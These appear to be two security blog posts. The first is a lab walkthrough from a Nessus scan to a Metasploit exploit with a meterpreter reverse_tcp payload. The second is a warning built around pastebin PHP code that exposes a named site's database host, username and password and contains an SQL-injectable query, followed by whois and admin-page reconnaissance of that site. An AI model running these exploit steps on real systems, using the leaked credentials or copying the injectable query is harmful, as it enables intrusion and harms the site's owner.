From Nessus to Metasploit to game over

How many times have you fired off a Nessus scan and then after finding the goodies you have to go to either ExploitDB , or a similar site in search for a exploit. Or if you are a pro then its off to go and write your own exploit for the newly discovered vulnerability.

Today’s post will focus on what to do after you have scanned that vulnerable system and found a juice vulnerability. If this is the first time you have heard of ExploitDB or Metasploit you should first visit the Metasploit Unleashed training site.

Lab setup

  • Backtrack 4 Linux VM
  • Windows 2003 server with a  vulnerable web app

Below are the necessary steps to get from a Nessus scan to the correct Metasploit module for  exploiting your system.

Step one: Install Nessus

You can download your copy of nessus from HERE and don’t forget to register for a homefeed license. Now create your scan policy or used from one of the default policies. I selected the web application policy since the target server was running and outdated web application.  Once your scan is completed download the report and save it in a .nessus format.

Step two: Launching  Metasploit

Login to your machine of choice, in my case its my BackTrack4 Linux VM. Issue the following commands to load Metasploit:

  • cd /pentest/exploits/framework3 (change directory to your metasploit installation dir)
  • ./msfconsole
  • svn up (to get the latest update)

Step three: DB Magic

At this stage you will need to create a DB, import the scanned nessus report, and then perform your hacking kungfu with the db_autopwn command.

msf > db_create

msf > db_connect
[-] Note that sqlite is not supported due to numerous issues.
[-] It may work, but don’t count on it
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db

db_import /pentest/results/nessus_report_TestSrvr.nessus
msf > db_import /pentest/results/nessus_report_Appsrvr.nessus
[*] Importing ‘Nessus XML (v2)’ data
[*] Importing host 10.10.0.19
[*] Successfully imported /pentest/results/nessus_report_TestSrvr.nessus

db_autopwn -t -x

This command will search Metasploit for any exploits that matches your various vulnerability from the Nessus report, it will not automatically run the exploit for our unless you use the -e option. In most cases if you are testing this against a live system then you should leave out the -e option to avoid crashing your server.

msf > db_autopwn -t -x
[*] Analysis completed in 10 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   10.10.0.19:445  exploit/windows/smb/psexec  (CVE-1999-0504, OSVDB-3106)
[*]   10.10.0.19:80  exploit/windows/http/apache_mod_rewrite_ldap  (CVE-2006-3747, BID-19204, OSVDB-27588)
[*] ================================================================================
[*]
[*]

From this point I have two exploits to choose from:

msf > use exploit/windows/http/apache_mod_rewrite_ldap
msf exploit(apache_mod_rewrite_ldap) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(apache_mod_rewrite_ldap) > set LHOST 10.10.0.17
LHOST => 10.10.0.17
msf exploit(apache_mod_rewrite_ldap) > set RHOST 10.100.0.9
RHOST => 10.100.0.9
msf exploit(apache_mod_rewrite_ldap) > exploit

From this point on its GAME OVER!

References:
http://www.metasploit.com/modules/exploit/windows/smb/psexec
http://www.metasploit.com/modules/exploit/windows/http/apache_mod_rewrite_ldap
http://www.offensive-security.com/metasploit-unleashed/Introduction
http://www.tenable.com/products/nessus/documentation

 

Being smart about testing your application

This is just going to be a short writeup on something I figure was worth mentioning. While going through pastebin I found the following entry  3 seconds after it was posted–> http://pastebin.com :

<?php

include ‘top.php’;

include ‘submenuhonorshall.php’;

/*SELECT * FROM TABLE WHERE field =

*/

$db = ‘gnemi_addison’;

mysql_connect(“gnemi.php-corner.com”, “gnemi_root”, “ignurupi87”) or die(mysql_error());

mysql_select_db($db) or die(mysql_error());

?>

<div id=”content”>

<h1>Honors Hall Library</h1>

<form method=”post”>

<p class=”norm”>

<select name=”searchby”>

<option value=”Author_First_Name”>Author First Name</option>

<option value=”Author_Last_Name” selected=”selected”>Author Last Name</option>

<option value=”Title”>Title</option>

</select>

<input type=”text” name=”query” />

<input type=”submit” value=”Submit!” />

</p>

</form>

<?php

$result = mysql_query(“SELECT * FROM `library` WHERE `'” . $_POST[‘searchby’] . “‘` = ‘” . $_POST[‘query’] . “‘ ORDER BY `Title` LIMIT 20”);

while ($row = mysql_fetch_array($result))

{

echo $row[‘Last Name’] . $row[‘First Name’] . $row[‘Title’] .$row[‘inout’];

}

?>

<?php

include ‘../address.php’;

include ‘../phptemplates/bottomhall.php’;

?>

Now to the average person that’s not a big deal, but to me after looking at that bit of php code the following questions came to mind:

  • Would I find anything useful if I were to Google the various pages referenced in that code or maybe the domain “gnemi.php-corner.com”?
  • What if I ran a whois lookup against that domain what would I find?
  • What if I Google the email addresses associated with that domain?
  • And most importantly are the username and password referenced stilling being used currently?
  • Are those tables and DB name real or just test names?
  • Would I find anything interesting if I were to crawl that website?

Now a simple whois returned a valid email address along with some other useful information:

And just out of curiosity after visiting http://gnemi.php-corner.com/godWindow/ I was presented with the following:

Now I ***DID NOT LOGIN*** I repeat  ***DID NOT LOGIN*** so I don’t know if those credential are valid BUT what if the were? I am hoping for this person’s sake all of the above information is just for testing purposes but what if its no? Sanitizing all valid  information before posting it would have been nice.